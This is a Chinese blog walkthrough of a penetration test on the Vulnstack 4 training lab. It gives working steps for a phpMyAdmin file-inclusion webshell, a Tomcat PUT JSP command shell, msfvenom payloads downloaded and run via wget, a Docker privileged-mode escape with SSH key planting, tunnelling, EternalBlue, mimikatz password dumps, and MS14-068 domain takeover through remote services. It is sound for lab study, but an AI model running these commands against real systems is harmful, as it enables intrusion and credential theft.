Skip to content

Latest commit

 

History

History
718 lines (411 loc) · 40.4 KB

记一次内网渗透(二).md

File metadata and controls

718 lines (411 loc) · 40.4 KB

本文由 简悦 SimpRead 转码, 原文地址 mp.weixin.qq.com

在上一节《记一次基础的 Vulnstack 渗透经验分享》中,我们简单的对 vulnstack 1 的靶场环境做了一次测试,通过外网初探、信息收集、攻入内网最终拿下域控,整个流程算是比较顺利,毕竟这个靶场环境比较基础。如今,vulnstack 系列的内网渗透靶场已经发布了六个,在本节中,我们将对 vulnstack 4 这个靶场进行渗透测试。靶场地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/6/

本次靶场渗透包括反序列化漏洞、命令执行漏洞、Tomcat 漏洞、MS 系列漏洞、端口转发漏洞、以及域渗透等多种组合漏洞。

目标:域控中存在一份重要文件——《漂亮国网络攻击授权报告》。

靶场学习路径,可参考:

st漏洞利用phpmyadmin getshelltomcat 漏洞利用docker逃逸ms14-068ssh密钥利用流量转发历史命令信息泄露域渗透

靶场环境:

image-20200727010014948

Web 服务器有两个网卡,一个网卡连接外网,对外提供 web 服务,另一个网卡连接内网。并且 Web 服务器里分别运行有 apache(2001 端口)、Tomcat(2002 端口)、phpmyadmin(2003 端口)。域成员主机和 DC 位于内网,且不能与外网通信。

环境配置

下载靶场后,

image-20200726110449209

将其解压,通过. ovf 格式的文件分别将靶场导入虚拟机,然后配置三台虚拟主机的网络环境。

Web 服务器(Ubuntu):

双网卡,一个网卡连接外网,对外提供 web 服务,另一个网卡连接内网。

模拟外网 IP:192.168.0.105

image-20200726110838067

内网 IP:192.168.183.128

image-20200726110857086

我在这里将网络适配器 2 连到了 VMnet14 这个网卡上,稍后需要将 VMnet14 这个网卡设为仅主机模式。

域成员主机 Windows 7:

Windows 7 就只有一个网卡,将其连到 VMnet14 这个网卡上

image-20200726111108183

DC(Windows server 2008):

DC 也就只有一个网卡,也将其连到 VMnet14 这个网卡上

image-20200726111237061

然后编辑虚拟网络设置:

添加一个 VMnet14 的网络,将其设置为仅主机模式,如下图所示:

image-20200726111337277

这样,我们就为这三台虚拟主机构建了一个内网,DC 和域成员祝你 Windows 7 位于内网,外网访问不到他们,Web 服务器作为连接内网和外网的枢纽。

我们的 Web 服务器为 Ubuntu,且其环境都是由 docker 启动的,根据靶场描述,我们需要启动的环境有:

s2-045CVE-2017-12615(tomcat put 上传)cve-2018-12613(phpmyadmin 文件包含漏洞)

进入到相关目录中,用docker-compose up -d命令开启,如下图:

image-20200726181428101

查看运行的 docker 容器:

image-20200726181517178

可见,环境开启成功。

外网初探

此时攻击者并不清楚目标整个网络环境,也不知道 Web 服务器上面运行有什么服务。

我们已知 Web 服务器的公网 IP 为 192.168.0.105(模拟),所以,我们可以先对其 Web 服务器进行端口扫描,如下:

nmap -T4 -sC -sV 192.168.0.105

image-20200726183457207

可知其开启了 ssh、Tomcat、phpmyadmin 等,其端口号由于版本如上图一目了然。我们先来测试 PhpMyAdmin 4.8.1 的漏洞(CVE-2018-12613),该漏洞相比大家已经很熟悉了,是 phpMyAdmin 4.8.1 版本的一个文件包含漏洞,通过 二次 url 编码 即可绕过过滤。

PhpMyAdmin 4.8.1 文件包含漏洞

我们访问 web 服务器上的 phpmyadmin:

image-20200726184358345

测试 CVE-2018-12613 漏洞:

http://http://192.168.0.105:2003/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

image-20200726184543848

如上图成功利用,可见确实存在该漏洞。接下来,我们可以通过开启 mysql 全局日志并改变写入的日志的路径来 getshell,但是该方法在SET GLOBAL general_log='on'开启全局日志是收到了权限限制,所以我们可以考虑包含 session 文件来 getshell。

在 sql 执行处执行select '<?php phpinfo();?>',并 F12 查看当前页面 cookie 中的 phpmyadmin 的值。

image-20200726193451455

得到此时网络 cookie 中的 phpmyadmin 值为 20b3a71f70b1cb0cd5a34fb7d7b4cf37,则此时产生的 session 文件名为 sess_20b3a71f70b1cb0cd5a34fb7d7b4cf37。构建包含 Session 值的 URL 路径,包含该 session 文件:

?target=db_datadict.php%253f/../../../../../../../../../tmp/sess_20b3a71f70b1cb0cd5a34fb7d7b4cf37

image-20200726192846661

包含成功,显示了 phpinfo 页面,接下来我们要利用文件包含漏洞来 getshell。在 sql 执行处执行一下语句来在 session 文件中写入免杀的 webshell:

SELECT "<?php $p = array('f'=>'a','pffff'=>'s','e'=>'fffff','lfaaaa'=>'r','nnnnn'=>'t');$a = array_keys($p);$_=$p['pffff'].$p['pffff'].$a[2];$_= 'a'.$_.'rt';$_(base64_decode($_REQUEST['whoami']));?>"

image-20200726193638452

F12 查看 cookie 中的 phpmyadmin 值:

image-20200726193738519

蚁剑连接:

image-20200726193847620

连接成功:

image-20200726193923821

然而,我们虽然拿到了目标服务器的 shell,但此时的 shell 只是目标机 docker 中的 shell,要想实现对 docker 宿主机的控制,我们还要 docker 逃逸。

Tomcat 任意文件上传漏洞(CVE-2017-12615)

上面我们演示了 PhpMyAdmin 4.8.1 文件包含漏洞拿到了目标的 shell,接下来我们演示利用 Tomcat 任意文件上传漏洞(CVE-2017-12615)来获取目标的控制权。(本次渗透也以该漏洞为主)

我们在当开始的 nmap 端口扫描中可以发现,目标 Web 服务器的 2002 端口上运行着 Tomcat,并且版本为 8.5.19。我们知道 Tomcat 的漏洞比较出名的有 CVE-2017-12615,CVE-2017-12615 是 Tomcat 中间件的任意文件上传漏洞,但此漏洞影响范围是 Apache Tomcat 7.0.0 – 7.0.79,我们靶机的 Tomcat 版本似乎不再影响范围之内,是实际中 Tomcat 5-9 均存在类似 CVE-2017-12615 的利用方式,同样可以类比运用,但这不归属于 CVE-2017-12615 漏洞。

访问目标 Web 服务器的 Tomcat:

image-20200726195327994

抓包,

image-20200726195527337

在以上红框处做修改,将 GET 方法改为 PUT,并上传 webshell 文件 shell.jsp,其中内容如下:

<%@ page import="java.util.*,java.io.*,java.net.*"%><%%><HTML><BODY><FORM METHOD="POST" ) != null) {        out.println("Command: " + request.getParameter("cmd") + "\n<BR>");        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));        OutputStream os = p.getOutputStream();        InputStream in = p.getInputStream();        DataInputStream dis = new DataInputStream(in);        String disr = dis.readLine();        while ( disr != null ) {                out.println(disr); disr = dis.readLine(); }        }%></pre></BODY></HTML>

(注意:红框里的文件名处,必须为/shell.jsp/的格式,最后的/一定要带着)

上传成功,然后访问该文件的 url:

image-20200726200036021

得到一个输入框,开输入框可以用来执行命令,相当于我们上传了一个后门。

我们也可以用curl来上传,即在攻击者执行:

# -F "file=@{FILE_NAME}" 指定上传文件 curl -v -X PUT -F "file=@shell.jsp" 192.168.0.105:2002/shell.jsp/

当然,我们可以直接在攻击机上用 searchsploit 来查找 Tomcat 的 8.5.19 版本的利用脚本,

searchsploit tomcat 8.5.19   // 查找tomcat 8.5.19的利用脚本

image-20200726200940536

找到了利用脚本 42966.py,执行以下命令将利用脚本复制到当前的工作目录(-m 参数):

searchsploit -m /exploit/jsp/webapps/42966.py

image-20200726200228537

利用该脚本:

python 42966.py

image-20200726212513148

可以看到帮助页面,如上图。

然后,检查目标机是否存在漏洞:

python 42966.py -u http://192.168.0.105:2002/

image-20200726201513820

可知目标存在漏洞并成功上传了一个测试的文件 Poc.jsp:

image-20200726201604441

进行正式攻击:

python 42966.py -u http://192.168.0.105:2002/ -p pwn

image-20200726201743954

如上图,成功的到了目标的 shell,原理就是在目标机上传了一个 pwn.jsp。但此 shell 不太稳定且丑,所以我们还是老老实实的用第一种方法上传的后门吧。经过如下测试,我们发现我们获得的 shell 运行在一个 docker 容器内:

image-20200726203224850

那我们就需要 docker 逃逸来获取目标主机(docker 宿主机)的 shell。首先为了之后上传文件的方便,我们先反弹一个 meterpreter 过来。

生成 msf 马:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=4444 -f elf > shell.elf

image-20200726204146745

然后使用 python 在当前目录下开启一个简单的 HTTP 服务(默认端口为 8000):

python -m SimpleHTTPServer

image-20200726204343471

然后在利用之前上传的 shell.jsp 执行 wget 命令,将攻击机上的 shell.elf 下载下来执行:

wget http://192.168.0.108:8000/shell.elfchmod 777 shell.elf./shell.elf

image-20200726204926391image-20200726205032135

如上图,msf 成功获得了会话。

利用 CVE-2019-5736 逃逸

在 Docker 18.09.2 之前的版本中使用的 runc 版本小于 1.0-rc6,因此允许攻击者重写宿主机上的 runc 二进制文件,攻击者可以在宿主机上以 root 身份执行命令。

平台或产品 受影响版本 Docker Version < 18.09.2 runC Version <= 1.0-rc6

恶意容器需满足以下两个条件之一:

• 由一个攻击者控制的恶意镜像创建 • 攻击者具有某已存在容器的写权限,且可通过 docker exec 进入。

首先下载并编译 main.go 脚本,生成攻击 payload:https://github.com/Frichetten/CVE-2019-5736-PoC

image-20200726135502816

打开 main.go 脚本,将脚本中要在目标机上执行的命令修改为反弹 shell 的命令,IP 为攻击机 IP,端口为攻击机监听的端口:

image-20200726143051634

编译生成 payload

CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build main.go

image-20200726141650534

用 msf 的会话将编译得到的 main 文件上传到 docker 容器的 / home 目录中,并赋权:

image-20200726205446420

接着在攻击机 kali 上面启动 nc 监听:

nc -lvp 4444

接着在目标 docker 上面运行 main 文件,

image-20200726205558127

此时,只需等待目标机管理员重启该 docker 容器,payload 就会触发,如下图,我们手动模拟 docker 重启:

image-20200726201329235

payload 执行成功:

image-20200726212554147

但此时攻击机却并没有收到 shell,很有可能目标 docker 不在漏洞影响范围内,我们只能用另一种方法来逃逸。

利用 --privileged 特权模式逃逸

特权模式于版本 0.6 时被引入 Docker,允许容器内的 root 拥有外部物理机 root 权限,而此前容器内 root 用户仅拥有外部物理机普通用户权限。

使用特权模式启动容器,可以获取大量设备文件访问权限。因为当管理员执行 docker run —privileged 时,Docker 容器将被允许访问主机上的所有设备,并可以执行 mount 命令进行挂载。

当控制使用特权模式启动的容器时,docker 管理员可通过 mount 命令将外部宿主机磁盘设备挂载进容器内部,获取对整个宿主机的文件读写权限,此外还可以通过写入计划任务等方式在宿主机执行命令。

我们看到靶场描述中有一个 “ssh 密钥利用”,猜测是利用 docker 的特权模式来在宿主机硬盘中写入 ssh 私钥,实现 ssh 免密登录宿主机,从而实现对目标宿主机的控制。

首先我们现在 docker 中新建一个 / hack 目录用来挂在文件:

image-20200726212218942

然后ls /dev看到 / dev 目录会发现很多设备文件,

image-20200726212308275image-20200726212349204

我们可以尝试将 / dev/sda1 挂载到 / hack 目录里:

mount /dev/sda1 /hack

image-20200726205955256

查看是否挂在成功:

image-20200726205934430

如上图,挂载成功了,此时我们就可以通过访问容器内部的 / hack 路径来达到访问整个宿主机的目的

在 docker 容器里挂载一个宿主的本地目录,这样某些容器里输出的文件,就可以在本地目录中打开访问了。

然后,在攻击机本地生成 ssh 秘钥:

ssh-keygen -f hackchmod 600 hack    // 不要忘记对秘钥文件赋600权限,否则不能执行哦

即可在当前目录下生成一个秘钥文件

image-20200726214224394

接下来要做的就是将生成的秘钥写入到目标机中了。前面说了,将 sda1 挂载成功,我们就可以通过访问容器内部的 / hack 路径来达到访问整个宿主机的目的,比如我们访问/hack/home目录也就是访问宿主机的/home目录:

image-20200726213611924

看见一个 Ubuntu 用户的主目录,进去看看,ls -alh /hack/home/ubuntu(查看包括隐藏的文件):

image-20200726213802663

我们看见了一个. ssh 目录,我们也就是要将 ssh 秘钥写入到. ssh 目录里面并将文件命名为 authorized_keys(目标机. ssh 目录权限必须为 700)。

依次执行如下命令写入秘钥:

cp -avx /hack/home/ubuntu/.ssh/id_rsa.pub /hack/home/ubuntu/.ssh/authorized_keys    # -avx是将权限也一起复制echo > /hack/home/ubuntu/.ssh/authorized_keys      # 清空authorized_keys文件echo '生成的.pub文件的内容' > /hack/home/ubuntu/.ssh/authorized_keys    # 将ssh秘钥写入authorized_keys文件

image-20200726214107822image-20200726214121843image-20200726214344029

查看秘钥是否写入成功:

cat /hack/home/ubuntu/.ssh/authorized_keys

image-20200726214429875

写入成功。

此时,攻击者就可以利用自己的私钥进行免密登陆目标宿主机了:

ssh -i hack ubuntu@192.168.0.105

image-20200726230954097

成功拿到目标机(docker 宿主机)Web 服务器的 shell。

查看一下网络配置:ifconfig

image-20200726231138665

可知,目标 Web 服务器除了一个公网 IP(192.168.0.105)外,还有一个内网 IP(192.168.183.129)。然后我们在目标及上用 wget 下载我们之前生成的 msf 马,并执行,反弹一个 meterpreter 过来,

攻击机开启 python 简单 web 服务:python -m SimpleHTTPServer

目标机执行:

wget http://192.168.0.108:8000/shell.elfchmod 777 shell.elf./shell.elf

image-20200726233418499

攻击机 msf 得到会话:

image-20200726232718663

接下来我们要做的就是设置代理通向内网、扫描内网主机、添加路由继续渗透等等。

攻入内网

我们在目标 Web 服务器上面上传 earthworm,并开启 socks5 正向代理:

./ew_for_linux64 -s ssocksd -l 1080

image-20200726234217342image-20200726234049550

之后攻击机配置好 proxychains:

vim /etc/proxychains.conf

image-20200726233903099

此时,我们攻击机上的应用程序就可以通过 proxychains 代理进目标内网了。探测目标内网的主机存活:

proxychains4 nmap -sT -Pn 192.168.183.1/24 > nmap.txt

image-20200727001019376

经过扫描可以得知目标内网中还有 192.168.183.130 和 192.168.183.131 这两台主机。

既然是攻击内网,我们当然少不了试试 ms17_010 了,我们先在 msf 上添加一个通往内网的路由:

run autoroute -s 192.168.183.0/24run autoroute -p

image-20200726235550002

添加成功,开始扫描目标内网中存在 ms17_010 永恒之蓝漏洞的主机:

image-20200727005348396

发现两个主机都存在漏洞,先打那个 Windows 7(192.168.183.131):

setg Proxies socks5:192.168.0.105:1080       // 设置代理,不设置代理ms17_010很难打通use exploit/windows/smb/ms17_010_eternalblueset payload windows/x64/meterpreter/bind_tcpset rhost 192.168.183.131set lport 4444set AutoRunScript post/windows/manage/migrate             // 自动迁移进程run

注意要setg Proxies socks5:192.168.0.105:1080设置代理,不设置代理 ms17_010 很难打通,不知道为什么,也是刚学到的。

img

攻击成功了,得到 shell 后要马上执行命令,否则 session 可能会意外退出,这是代理工具的问题,EW 好像超时不操作就会自动断开。这里我们防止 session 以外退出,有一种方法是可以在目标 Windows 7 上传了一个 bind_tcp 正向的后门,这样即使连接再断了,我们也不用像 ms17_010 那样再打一遍,而是只执行一下 run 就可以了:

run persistence -X -i 5 -p 4000 -P windows/meterpreter/bind_tcp

image-20200727011427115image-20200727131446514

还有一种最直接的方法,就是换个代理工具吧,这里我们将 EW 换成小离大佬推荐的 chisel,据说十分稳定和强大,项目地址:https://github.com/jpillora/chisel

在目标 web 服务器上传 chisel_for_linux64,然后执行:

./chisel_for_linux64 server -p 2333 --socks5

image-20200727111450263

攻击机执行:

./chisel_for_linux64 client 192.168.0.105:2333 socks

image-20200727111511486

如上图,成功在攻击机上面的 1080 端口开启了一个 socks5 监听,接下来只需在 msf 上setg Proxies socks5:127.0.0.1:1080把代理指向 127.0.0.1:1080 就可以了:

image-20200727112554528

如上图,ms17_010 一遍成功,而且 session 再也不会 die 掉了。

为了方便接下来的信息收集,我们需要把当前权限降到普通域用户,因为不是域用户的话是没有权限执行域命令的。

getuid    #查看当前tokenuse incognito #加载incognitolist_tokens -u #列出AccessTokenimpersonate_token "DEMO\douser" #模拟DEMO\douser用户rev2self   #返回到之前的AccessToken权限

接下来要做的就是信息收集了,详细的内网信息收集请看我的另一篇文章《内网渗透测试:信息收集与上传下载》,这里我们只做几个有用的信息收集。

ipconfig /all   查看本机ip,所在域 route print     打印路由信息 net view        查看局域网内其他主机名 arp -a          查看arp缓存 whoami net start       查看开启了哪些服务 net share       查看开启了哪些共享 net share ipc$  开启ipc共享 net share c$    开启c盘共享 net use \\192.168.xx.xx\ipc$ "" /user:""   与192.168.xx.xx建立空连接 net use \\192.168.xx.xx\c$ "密码" /user:"用户名"  建立c盘共享 dir \\192.168.xx.xx\c$\user    查看192.168.xx.xx c盘user目录下的文件  net config Workstation   查看计算机名、全名、用户名、系统版本、工作站、域、登录域 net user                 查看本机用户列表 net user /domain         查看域用户 net localgroup administrators   查看本地管理员组(通常会有域用户) net view /domain         查看有几个域 net user 用户名 /domain   获取指定域用户的信息 net group /domain        查看域里面的工作组,查看把用户分了多少组(只能在域控上操作) net group 组名 /domain    查看域中某工作组 net group "domain admins" /domain  查看域管理员的名字 net group "domain computers" /domain  查看域中的其他主机名 net group "doamin controllers" /domain  查看域控制器(可能有多台)

image-20200727104410758image-20200727104351567image-20200727104235782image-20200727104720174image-20200727104314816image-20200727104333838

经过一波收集我们得知,目标 Windows 7 在 DEMO.com 域中,域控为 WIN-ENS2VR5TR3N$,域管理员为 Administrator,我们 ping 一下主域,查看域控的 IP:

ping WIN-ENS2VR5TR3N.DEMO.com

image-20200727102726437

可知域控 IP 为 192.168.183.130。

在目标机上传 mimikatz,抓一下 Windows 7 的密码:

image-20200727114859057

shellmimikatz.exeprivilege::debugsekurlsa::logonpasswords

此处有个坑,我用 ms17_010 获得的 system 权限在运行 mimikatz 的时候回报错:

image-20200727113418518

反复折腾了一番最后模拟了一个目标机上的 system 的令牌竟然成功了:(不可思议,有大佬知道为什么的话请告诉我)

image-20200727120518887

得到 douser 用户的明文密码为 Dotest123。接下来我们就可以继续横向移动攻击域控了。

攻入域控

首先看看能不能用永恒之蓝攻下域控:

image-20200727121643085

失败了。既然我们得到了域用户 douser 的密码,我们为何不试一下 PTT(ms14-068)呢?下面演示 ms14-068 的利用过程:

在目标 Windows 7 上传 ms14-068.exe,然后执行如下生成 TGT 票据:

ms14-068.exe -u douser@DEMO.com -s S-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.183.130 -p Dotest123// ms14-068.exe -u 域成员名@域名.com -s 域成员sid -d 域控制器ip地址 -p 域成员密码

image-20200727102524532image-20200727130818982

如上图成功生成票据文件 “TGT_douser@DEMO.com.ccache”。然后利用 mimikatz 注入票据:

mimikatz # kerberos::purge         //清空当前机器中所有凭证,如果有域成员凭证会影响凭证伪造mimikatz # kerberos::list          //查看当前机器凭证mimikatz # kerberos::ptc <生成的票据文件>   //将票据注入到内存中

使用 mimikatz 将票据注入到当前内存中,伪造凭证,如果成功则拥有域管理权限,可任意访问域中所有机器

image-20200727131348684

如上图,票据注入成功。

查看注入是否成功klist

尝试 net use 登录域控:

net use \\WIN-ENS2VR5TR3N

image-20200727131745970

如上图,成功登录域控并列出了域控的 c 盘目录。此时要想控制域控我们还要在 Windows 7 上面上传一个正向的 msf 马。

msfvenom -p windows/meterpreter/bind_tcp lhost=192.168.0.108 lport=4444 -f exe -o bind.exe

image-20200727135114886

将生产的 msf 上传到 Windows 7 上,然后用 smb 文件共享将 msf 马 copy 到域控的 C 盘:

copy c:\windows\system32\bind.exe \\WIN-ENS2VR5TR3N\c$

复制成功:

image-20200727135631280

通过远程在域控上面设置好计划任务:

schtasks /create /tn "test" /tr C:\windows\system32\bind.exe /sc MINUTE /S 192.168.183.130

显示 Access is denied:

image-20200727130719339

我们用 sc 服务来远程执行。

关闭防火墙:

sc \\WIN-ENS2VR5TR3N create unablefirewall binpath= "netsh advfirewall set allprofiles state off"sc \\WIN-ENS2VR5TR3N start unablefirewall

image-20200727141352311

创建服务执行 msf 马(msf 正在监听):

sc \\WIN-ENS2VR5TR3N create bindshell binpath= "c:\bind.exe"sc \\WIN-ENS2VR5TR3N start bindshell

image-20200727142350771

msf 成功上线域控

image-20200727142154983

上传 mimikatz 抓明文密码:

image-20200727143442424

得到域管理员密码为 Liu78963。

寻找敏感文件

拿下域控后,我们就要寻找开头说的那个域控中的重要文件了。

我们开启域控的远程桌面:

run post/windows/manage/enable_rdp

image-20200727143038296

登录:

proxychains4 rdesktop 192.168.183.130

image-20200727141042809

登录成功。上传 Everything 工具:

image-20200727144021536

安装:

image-20200727144058925

打开 Everything,开启 HTTP 服务,设置端口为 2333:

image-20200727145817157

开启成功,然后攻击者浏览器设置代理:127.0.0.1:1080(前面不是开启了 chisel 代理了吗)

image-20200727144440888

这是就可以在 url 里访问 192.168.183.130:2333 来遍历域控上的任何文件了:

image-20200727145841784

搜索目标敏感文件:

image-20200727150554336

Ending

整个靶场打下来可以学到不少,主要有以下重点内容:

PhpMyAdmin 4.8.1文件包含漏洞Tomcat 任意文件上传漏洞(CVE-2017-12615)docker逃逸新的代理工具chisel的使用(十分强大稳定)......

推荐阅读:

**实战 | 记一次基础的内网 Vulnstack 靶机渗透(一
**

**实战 | 记一次 Vulnstack 靶场内网渗透(三)
**

**实战记录 | 自主搭建的三层网络域渗透靶场
**

记一次详细的内网渗透过程

内网渗透 | 常用的内网穿透工具使用

内网渗透 | 手把手教你如何进行内网渗透

内网渗透 | 域渗透实操 ATT&CK

点赞 在看 转发

原创投稿作者:Mr.Anonymous

博客: whoamianony.top